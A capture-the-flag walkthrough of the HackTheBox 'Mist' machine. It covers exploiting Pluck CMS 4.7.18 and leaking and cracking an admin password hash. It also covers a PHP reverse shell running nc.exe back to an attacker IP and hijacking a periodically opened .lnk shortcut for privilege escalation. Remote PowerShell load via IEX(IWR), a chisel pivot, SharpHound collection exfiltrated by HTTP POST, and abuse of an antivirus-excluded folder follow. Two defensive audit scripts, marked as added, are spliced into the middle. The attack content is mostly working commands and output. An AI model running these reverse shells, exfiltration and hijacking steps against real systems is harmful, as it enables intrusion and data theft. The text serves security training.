Mist

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.17:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.10.11.17
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-10 19:12 UTC
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:12
Completed Parallel DNS resolution of 1 host. at 19:12, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:12
Scanning 10.10.11.17 [1 port]
Discovered open port 80/tcp on 10.10.11.17
Completed Connect Scan at 19:12, 0.08s elapsed (1 total ports)
Initiating Service scan at 19:12
Scanning 1 service on 10.10.11.17
Completed Service scan at 19:12, 6.21s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.11.17.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 5.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.38s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
Nmap scan report for 10.10.11.17
Host is up, received user-set (0.079s latency).
Scanned at 2024-07-10 19:12:45 UTC for 13s

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
|_http-generator: pluck 4.7.18
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries 
|_/data/ /docs/

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.92 seconds
└─$ grep mist /etc/hosts
10.10.11.17     mist.htb
192.168.100.100         mist.htb DC01.mist.htb
192.168.100.101         ms01.mist.htb

HTTP (80)

Pluck CMS

The file query parameter selects which page to display; an LFI attempt through it only returns "Hacking Attempt Detected".

Writeup.png

The highlighted admin link leads to a login page:

Writeup-1.png

The Pluck version is also shown on the login page. Exploit-DB has a matching entry, "Pluck v4.7.18 - Remote Code Execution (RCE)":

└─$ curl -L https://www.exploit-db.com/download/51592 -s | sed 's/localhost\/pluck/10.10.11.17/g' > pluck_exploit.py
└─$ weevely generate Password123$ miri.php
Generated 'miri.php' with password 'Password123$' of 781 byte size.
└─$ zip -r mirabbas.zip miri.php
  adding: miri.php (deflated 32%)
└─$ py pluck_exploit.py
ZIP file path: ./mirabbas.zip
Login account
ZIP file download.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 Server at 10.10.11.17 Port 80</address>
</body></html>

The exploit was not successful, most probably because the upload feature is only available to authenticated users.

[CVE-2023-50564](https://www.cvedetails.com/cve/CVE-2023-50564/ "CVE-2023-50564 security vulnerability details") was also unsuccessful:

http://10.10.11.17/data/inc/modules_install.php
> Access denied!

"Pluck CMS 4.7 - Directory Traversal" seems plausible, considering we have access to the modules directory:

# Exploit Title: Pluck 4.7 Directory Traversal
# Google Dork: filetype:php inurl:"/data/modules/albums/albums_getimage.php?image="
# Date: 08/05/15
# Exploit Author: Wadeek
# Vendor Homepage: http://www.pluck-cms.org/?file=home
# Software Link: http://www.opensourcecms.com/scripts/redirect/download.php?id=167
# Version: 4.7
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini
###################################################################################
Writeup-2.png

This method was not successful either, because any occurrence of .. in the URL triggers the "Blocked Hacking Attempt" response.

For CVE-2023-50564 we could reach /data/inc, but /data returns no directory listing, so the file names have to be guessed. The upstream repository is a good wordlist for that:

└─$ git clone https://github.com/pluck-cms/pluck.git
└─$ cd ./pluck/data
└─$ find . -name '*.php' | grep -v '/lang/' > phpfuzz.txt
└─$ ffuf -u 'http://10.10.11.17/data/FUZZ' -w ./phpfuzz.txt -mc all -fr 'denied'
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.17/data/FUZZ
 :: Wordlist         : FUZZ: /home/woyag/Desktop/Rooms/Mist/pluck/data/phpfuzz.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Regexp: denied
________________________________________________

./inc/lib/tarlib.class.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 108ms]
./inc/lib/simple-php-captcha/simple-php-captcha.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 124ms]
./inc/lib/simple-php-captcha/index.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 136ms]
./themes/oldstyle/info.php [Status: 200, Size: 251, Words: 24, Lines: 10, Duration: 93ms]
./themes/default/info.php [Status: 200, Size: 253, Words: 25, Lines: 10, Duration: 100ms]
./modules/albums/albums_getimage.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 87ms]
./settings/langpref.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 102ms]
:: Progress: [72/72] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

The GitHub repository shows only one file in settings, langpref.php, but there seems to be more to it!

Writeup-3.png

We can also find the albums module under settings, but we can't read the PHP files directly...

Writeup-4.png

Leaked Credentials

For some reason /data/modules/albums/albums_getimage.php lets us read files from /data/settings/modules/albums/* by name, without any .. in the request:

└─$ curl http://10.10.11.17/data/modules/albums/albums_getimage.php?image=mist.php
<?php
$album_name = 'Mist';
?>30
└─$ curl http://10.10.11.17/data/modules/albums/albums_getimage.php?image=admin_backup.php
<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>146 
| Hash | Type | Value |
| --- | --- | --- |
| c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e | sha512 | lexypoo97 |

Writeup-5.png

We can log in to the CMS with this password, and can now use the earlier exploits to gain RCE.

The PoC script for module upload kept failing so I uploaded the p0wny.php shell manually and it worked.

Writeup-6.png

Reverse Shell (ms01\svc_web)

So, as always, HTB deletes this folder periodically, so the p0wny shell can't stay active for more than a minute... I was trying to use PowerShell #3 (Base64) as usual, but it seems like AV is active on the box! One way to bypass this would be to upload nc.exe and get a connection back.

└─$ cp /usr/share/windows-binaries/nc.exe .
└─$ cat rev.php
<?php
system(".\\nc.exe 10.10.14.129 4444 -e powershell");
?> 
└─$ zip -r rev.zip rev.php nc.exe 
  adding: rev.php (deflated 3%)
  adding: nc.exe (deflated 52%)
PS C:\> whoami /all
User Name    SID
============ ==============================================
ms01\svc_web S-1-5-21-1075431363-3458046882-2723919965-1000

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Might as well update hosts file.

PS C:\xampp\htdocs\data\settings> cat options.php
<?php
$sitetitle = 'Mist';
$email = 'admin@mist.htb';
?>

xampp hosts only the Pluck CMS installation and that's about it; otherwise everything seems to be at defaults.

Root directory does contain something unusual:

PS C:\> ls
    Directory: C:\
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2024   1:50 AM                Common Applications
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         2/20/2024   5:44 AM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---         2/21/2024  12:37 PM                Users
d-----         3/26/2024  12:02 PM                Windows
d-----         3/10/2024   3:21 AM                xampp
PS C:\> ls 'C:\Common Applications' -Filter *.lnk | % {
    $lnkPath = $_.FullName
    $shell = New-Object -ComObject WScript.Shell
    $shortcut = $shell.CreateShortcut($lnkPath)

    # Resolve the shortcut and emit one object per .lnk
    $shortcutInfo = [PSCustomObject]@{
        ShortcutPath = $lnkPath
        TargetPath   = $shortcut.TargetPath
        Arguments    = $shortcut.Arguments
        Description  = $shortcut.Description
        WorkingDirectory = $shortcut.WorkingDirectory
        IconLocation = $shortcut.IconLocation
    }
    $shortcutInfo
}

ShortcutPath     : C:\Common Applications\Calculator.lnk
TargetPath       : C:\Windows\system32\win32calc.exe
Arguments        :
Description      : Performs basic arithmetic tasks with an on-screen calculator.
WorkingDirectory :
IconLocation     : %windir%\system32\win32calc.exe,0

ShortcutPath     : C:\Common Applications\Notepad.lnk
TargetPath       : C:\Windows\system32\notepad.exe
Arguments        :
Description      : Creates and edits text files using basic text formatting.
WorkingDirectory : %HOMEDRIVE%%HOMEPATH%
IconLocation     : %windir%\system32\notepad.exe,0

ShortcutPath     : C:\Common Applications\Wordpad.lnk
TargetPath       : C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
Arguments        :
Description      : Creates and edits text documents with complex formatting.
WorkingDirectory :
IconLocation     : %ProgramFiles%\Windows NT\Accessories\wordpad.exe,0

Privilege Escalation (mist\brandon.keywarp)

PS C:\> $directory = "C:\Common Applications"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = $directory
$watcher.Filter = "*.lnk"
$watcher.IncludeSubdirectories = $true
$watcher.NotifyFilter = [System.IO.NotifyFilters]'FileName, LastAccess'
$accessLog = @{}
$action = {
    $filePath = $eventArgs.FullPath
    if ($accessLog.ContainsKey($filePath)) {
        $accessLog[$filePath]++
    } else {
        $accessLog[$filePath] = 1
    }
}
Register-ObjectEvent $watcher 'Changed' -Action $action
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Deleted' -Action $action
Register-ObjectEvent $watcher 'Renamed' -Action $action
$watcher.EnableRaisingEvents = $true
Write-Output "Monitoring .lnk file access in $directory for 2 minutes..."
Start-Sleep -Seconds 120
Write-Output "Total .lnk file accesses in 2 minutes:"
foreach ($file in $accessLog.Keys) { Write-Output "File: $file, Access Count: $($accessLog[$file])"; }
Unregister-Event -SourceIdentifier * -ErrorAction SilentlyContinue
$watcher.Dispose()
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command
--     ----            -------------   -----         -----------     --------             -------
13     37e618dd-cb3...                 NotStarted    False                                ...
14     3d7644c5-880...                 NotStarted    False                                ...
15     ccfaf013-be0...                 NotStarted    False                                ...
16     1af4f5d6-de0...                 NotStarted    False                                ...
Monitoring .lnk file access in C:\Common Applications for 2 minutes...
Total .lnk file accesses in 2 minutes:
File: C:\Common Applications\Calculator.lnk, Access Count: 1
File: C:\Common Applications\Wordpad.lnk, Access Count: 1
File: C:\Common Applications\Notepad.lnk, Access Count: 1

# Credits: ChatGPT D:

Looks like these .lnk files are periodically accessed by someone, and that someone presumably isn't ms01\svc_web.

We also have write permission on the directory!

Get-Acl 'Common Applications' | Format-List

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Common Applications
Owner  : BUILTIN\Administrators
Group  : MS01\None
Access : NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  Write, ReadAndExecute, Synchronize
         MS01\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:S-1-5-21-1075431363-3458046882-2723919965-513D:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;0x1201bf;;;BU)
         (A;OICI;FA;;;LA)
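The ACL above is the whole problem: BUILTIN\Users can write into a directory whose shortcuts another account opens on a schedule. As an added defensive example (not part of the original writeup), the PowerShell audit below finds .lnk files that live in, or are themselves, objects broad groups can write to, and reports where each one points. The principal list, the rights mask and the directory list are constructed for the example; the only path taken from the box is C:\Common Applications.

```powershell
# Added example, not part of the original writeup: audit shortcut (.lnk) files in
# directories that broad groups can write to, the condition abused on this box.
# Assumptions: runs as any local user; $BroadPrincipals, $WriteMask and $dirs are
# constructed for the example. Inherited generic-rights ACEs are not decoded.

$BroadPrincipals = @('BUILTIN\Users', 'Everyone',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Rights that let a caller replace, delete or retarget a file in the directory.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

function Test-BroadWrite {
    # Returns the first broad principal holding write-capable rights on $Path, else $null.
    param([string]$Path)
    foreach ($rule in (Get-Acl -LiteralPath $Path).Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $rule.IdentityReference.Value) { continue }
        if (([int]$rule.FileSystemRights -band $WriteMask) -ne 0) { return $rule.IdentityReference.Value }
    }
    return $null
}

function Get-ShortcutAudit {
    # Emits one record per .lnk found under the given directories.
    param([string[]]$Directory)
    $shell   = New-Object -ComObject WScript.Shell
    $trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }
    foreach ($dir in $Directory) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        $dirWriter = Test-BroadWrite -Path $dir
        foreach ($lnk in Get-ChildItem -LiteralPath $dir -Filter *.lnk -Recurse -File) {
            $sc        = $shell.CreateShortcut($lnk.FullName)
            $target    = [Environment]::ExpandEnvironmentVariables([string]$sc.TargetPath)
            $inTrusted = [bool]($trusted | Where-Object { $target.StartsWith($_, 'OrdinalIgnoreCase') })
            [PSCustomObject]@{
                Shortcut        = $lnk.FullName
                Target          = $target
                Arguments       = $sc.Arguments
                DirWritableBy   = $dirWriter
                LnkWritableBy   = Test-BroadWrite -Path $lnk.FullName
                TargetInTrusted = $inTrusted   # target under Windows or Program Files
            }
        }
    }
}

# Directories to check (constructed): the one from this box plus the all-users Start
# Menu, whose shortcuts every interactive user's shell resolves.
$dirs = @('C:\Common Applications', "$env:ProgramData\Microsoft\Windows\Start Menu\Programs")
Get-ShortcutAudit -Directory $dirs |
    Where-Object { $_.DirWritableBy -or $_.LnkWritableBy } |
    Format-Table -AutoSize
```

Any row this prints is a shortcut an unprivileged user could retarget; a TargetInTrusted value of False on such a row is the case to look at first, and the fix is to remove the Write/CreateFiles bits for the broad group (or move the shortcuts somewhere only administrators can modify) rather than to monitor the directory.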

Use a Golang reverse shell to get a connection back (make sure to hardcode IP:PORT), then point the shortcut at it:

# $targetPath = "C:\Users\Public\rev.exe"
$shortcutPath = "C:\Common Applications\Notepad.lnk"
$targetPath = "C:\xampp\htdocs\data\modules\rev\rev.exe"
$wscript = New-Object -ComObject WScript.Shell
$shortcut = $wscript.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.Save()

After a minute or so we get a connection back:

PS C:\Windows\system32> whoami /all
User Name            SID
==================== ==============================================
mist\brandon.keywarp S-1-5-21-1045809509-3006658589-2426055941-1110

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                         Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Privilege Escalation (MS01 Administrator)

Enumeration

PS C:\users\Brandon.Keywarp> IEX(IWR http://10.10.14.129/PrivescCheck.ps1 -UseBasicParsing)

PS C:\users\public> Invoke-PrivescCheck
...
----------------------------------------------------------------
| CATEGORY | TA0043 - Reconnaissance                           |
| NAME     | User groups                                       |
----------------------------------------------------------------
| Get information about the groups the current user belongs to |
| (name, type, SID).                                           |
----------------------------------------------------------------
[*] Status: Informational

Name                                       Type           SID
----                                       ----           ---
MIST\Domain Users                          Group          S-1-5-21-1045809509-3006658589-2426055941-513
Everyone                                   WellKnownGroup S-1-1-0
BUILTIN\Users                              Alias          S-1-5-32-545
NT AUTHORITY\BATCH                         WellKnownGroup S-1-5-3
CONSOLE LOGON                              WellKnownGroup S-1-2-1
NT AUTHORITY\Authenticated Users           WellKnownGroup S-1-5-11
NT AUTHORITY\This Organization             WellKnownGroup S-1-5-15
LOCAL                                      WellKnownGroup S-1-2-0
NT AUTHORITY\LogonSessionId_0_14407262     LogonSession   S-1-5-5-0-14407262
Authentication authority asserted identity WellKnownGroup S-1-18-1
Mandatory Label\Medium Mandatory Level     Label          S-1-16-8192
...
----------------------------------------------------------------
| CATEGORY | TA0008 - Lateral Movement                         |
| NAME     | UAC settings                                      |
----------------------------------------------------------------
| Check whether User Access Control (UAC) is enabled and       |
| whether it filters the access token of local administrator   |
| accounts when they authenticate remotely.                    |
----------------------------------------------------------------
[*] Status: Vulnerable - Low

Key         : HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
Value       : EnableLUA
Data        : 1
Vulnerable  : False
Description : UAC is enabled.

Key         : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value       : LocalAccountTokenFilterPolicy
Data        : (null)
Vulnerable  : False
Description : Only the built-in Administrator account (RID 500) can be granted a high integrity token when
              authenticating remotely (default).

Key         : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value       : FilterAdministratorToken
Data        : (null)
Vulnerable  : True
Description : The built-in administrator account (RID 500) is granted a high integrity token when authenticating
              remotely (default).
...
----------------------------------------------------------------
| CATEGORY | TA0008 - Lateral Movement                         |
| NAME     | LAPS                                              |
----------------------------------------------------------------
| Check whether LAPS is configured and enabled. Note that this |
| applies to domain-joined machines only.                      |
----------------------------------------------------------------
[*] Status: Vulnerable - Medium

Policy      : Enable local admin password management (LAPS legacy)
Key         : HKLM\Software\Policies\Microsoft Services\AdmPwd
Default     : 0
Value       : (null)
Description : The local administrator password is not managed (default).

Policy      : LAPS > Configure password backup directory
Key         : HKLM\Software\Microsoft\Policies\LAPS
Default     : 0
Value       : (null)
Description : The local administrator password is not backed up (default).
... 
----------------------------------------------------------------
|                 ~~~ PrivescCheck Summary ~~~                 |
----------------------------------------------------------------
 TA0004 - Privilege Escalation
 Service binary permissions  High
 - Driver co-installers  Low
 TA0006 - Credential Access
 - LSA Protection  Low
 - Credential Guard  Low
 TA0008 - Lateral Movement
 - UAC settings  Low
 - LAPS  Medium

WARNING: To get more info, run this script with the option '-Extended'.

Looks like we are on a domain-joined member machine, not the domain controller...

PS C:\users> net user
User accounts for \\MS01
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
svc_web                  WDAGUtilityAccount
The command completed successfully.

PS C:\users> net user /domain
User accounts for \\DC01.mist.htb
-------------------------------------------------------------------------------
Administrator            Brandon.Keywarp          Florence.Brown
Guest                    Harry.Beaucorn           Jonathan.Clinton
krbtgt                   Markus.Roheb             op_Markus.Roheb
op_Sharon.Mullard        Sharon.Mullard           Shivangi.Sumpta
svc_cabackup             svc_smb

PS C:\users> ipconfig /all
Windows IP Configuration

   Host Name . . . . . . . . . . . . : MS01
   Primary Dns Suffix  . . . . . . . : mist.htb
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : mist.htb

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft Hyper-V Network Adapter
   Physical Address. . . . . . . . . : 00-15-5D-16-CB-07
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.100.101(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.100.100
   DNS Servers . . . . . . . . . . . : 192.168.100.100
   NetBIOS over Tcpip. . . . . . . . : Enabled
PS C:\users> ping 192.168.100.100
Pinging 192.168.100.100 with 32 bytes of data:
Reply from 192.168.100.100: bytes=32 time<1ms TTL=128
Reply from 192.168.100.100: bytes=32 time<1ms TTL=128
Reply from 192.168.100.100: bytes=32 time<1ms TTL=128
Reply from 192.168.100.100: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.100.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Update /etc/hosts

Use chisel to pivot into the Mist internal network:

└─$ chisel server -p 36000 --reverse
2024/07/17 14:24:48 server: Reverse tunnelling enabled
2024/07/17 14:24:48 server: Fingerprint NqMQ96o3Vp3paDt5eacPr6GbiNo+wj8sUnLR6g2q7oU=
2024/07/17 14:24:48 server: Listening on http://0.0.0.0:36000
2024/07/17 14:37:52 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
---
# PS C:\xampp\htdocs\files> Start-Job -ScriptBlock { & "C:\xampp\htdocs\files\chisel.exe" client 10.10.14.73:36000 R:socks; }
PS C:\xampp\htdocs\files> Start-Job -ScriptBlock { & "C:\xampp\htdocs\files\chisel.exe" client 10.10.14.73:36000 R:socks 4444:10.10.14.73:80; }
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command
--     ----            -------------   -----         -----------     --------             -------
3      Job3            BackgroundJob   Running       True            localhost             & "C:\xampp\htdocs\fi..."

PS C:\xampp\htdocs\files> get-job
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command
--     ----            -------------   -----         -----------     --------             -------
3      Job3            BackgroundJob   Running       True            localhost             & "C:\xampp\htdocs\fi..."
└─$ tail /etc/proxychains4.conf
[ProxyList]
...
socks5  127.0.0.1 1080 # <-- Required
└─$ proxychains netexec smb 192.168.100.100 -u '' -p '' --shares
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.100 445    DC01             [+] mist.htb\:
SMB         192.168.100.100 445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
└─$ proxychains netexec smb 192.168.100.101 -u '' -p '' --shares
SMB         192.168.100.101 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:mist.htb) (signing:False) (SMBv1:False)
SMB         192.168.100.101 445    MS01             [-] mist.htb\: STATUS_ACCESS_DENIED
SMB         192.168.100.101 445    MS01             [-] Error enumerating shares: Error while reading from remote

192.168.100.101 appears to be the MS01 member server and 192.168.100.100 the domain controller.

Bloodhound

Gather information about domain users:

PS C:\users\public> iwr 10.10.14.129/SharpHound.exe -outfile sh.exe
PS C:\users\public> .\sh.exe -c all --zipfilename sh.zip
PS C:\users\public> certutil.exe -encode 20240711034507_sh.zip sh.zip.base64

I was going to exfiltrate data with nc.exe, but it was now identified as a virus?... Odd.

└─$ listen > sh.zip.base64
---
PS C:\users\public> iwr 10.10.14.129 -Method POST -InFile sh.zip.base64                                  
---
└─$ ^C
└─$ tail -n +9 sh.zip.base64 | head -n -1 | base64 -di > sh.zip

Start BloodHound Community Edition (Docker) and start analyzing.

Writeup-7.png

Looks like we are dealing with Certificates.

Writeup-8.png
PS C:\users\public> net group /domain

Group Accounts for \\DC01.mist.htb
-------------------------------------------------------------------------------
*CA Backup
*Certificate Managers
*Certificate Services
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Operatives
*Protected Users
*Read-only Domain Controllers
*Schema Admins
*ServiceAccounts
*Virtualization Services

Certify

The Hacker Recipes > AD-CS

└─$ curl -LOs https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Certify.exe
---
PS C:\users\public> iwr 10.10.14.129/Certify.exe -outfile cy.exe

The antivirus kept deleting the file, insisting it was malicious. It said the same thing about netcat too, but initially we got a connection via netcat, so what's the problem?

I moved back to the modules directory and the antivirus seemed chill; this must mean the directory in xampp is excluded from antivirus detection and we can go bonkers! (but do mind that it gets periodically deleted...)
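An exclusion on a web root that the web service account can write to turns the antivirus off exactly where uploads land. As an added defensive example (not part of the original writeup), the script below lists Microsoft Defender's path, extension and process exclusions through Get-MpPreference and flags the ones that cover user-writable or web-served locations. The prefix, process and extension lists are constructed for the example; nothing on this box beyond the xampp path is assumed.

```powershell
# Added example, not part of the original writeup: audit Microsoft Defender exclusions
# for the pattern seen above (a web root that uploads land in is never scanned).
# Assumption: run from an elevated prompt; current Defender builds return empty
# exclusion lists to non-administrators. All "risky" lists below are constructed.
$pref = Get-MpPreference

# Web roots and locations ordinary users can write to.
$riskyPrefixes = @("$env:SystemDrive\xampp", "$env:SystemDrive\inetpub", "$env:SystemDrive\Users",
                   $env:ProgramData, $env:TEMP) | Where-Object { $_ }
# Script hosts and web servers: excluding the process means nothing it opens is scanned.
$riskyProcs = @('php.exe', 'httpd.exe', 'w3wp.exe', 'powershell.exe', 'pwsh.exe',
                'cscript.exe', 'wscript.exe', 'java.exe')
$riskyExts  = '^\.?(exe|dll|ps1|bat|cmd|vbs|js|php|jsp|aspx)$'

function Get-DefenderExclusionAudit {
    # Emits one record per exclusion with a Risky flag and the reason it was flagged.
    param($Preference)
    foreach ($p in @($Preference.ExclusionPath | Where-Object { $_ })) {
        $hit = $riskyPrefixes | Where-Object { $p.StartsWith($_, 'OrdinalIgnoreCase') } | Select-Object -First 1
        $why = if ($hit) { "under $hit" } else { '' }
        [PSCustomObject]@{ Kind = 'Path'; Value = $p; Risky = [bool]$hit; Reason = $why }
    }
    foreach ($e in @($Preference.ExclusionExtension | Where-Object { $_ })) {
        $bad = $e -match $riskyExts
        $why = if ($bad) { 'executable or script content never scanned' } else { '' }
        [PSCustomObject]@{ Kind = 'Extension'; Value = $e; Risky = $bad; Reason = $why }
    }
    foreach ($proc in @($Preference.ExclusionProcess | Where-Object { $_ })) {
        $bad = $riskyProcs -contains (Split-Path -Leaf $proc)
        $why = if ($bad) { 'script host or web server: files it opens are not scanned' } else { '' }
        [PSCustomObject]@{ Kind = 'Process'; Value = $proc; Risky = $bad; Reason = $why }
    }
}

Get-DefenderExclusionAudit -Preference $pref | Sort-Object Risky -Descending | Format-Table -AutoSize
```

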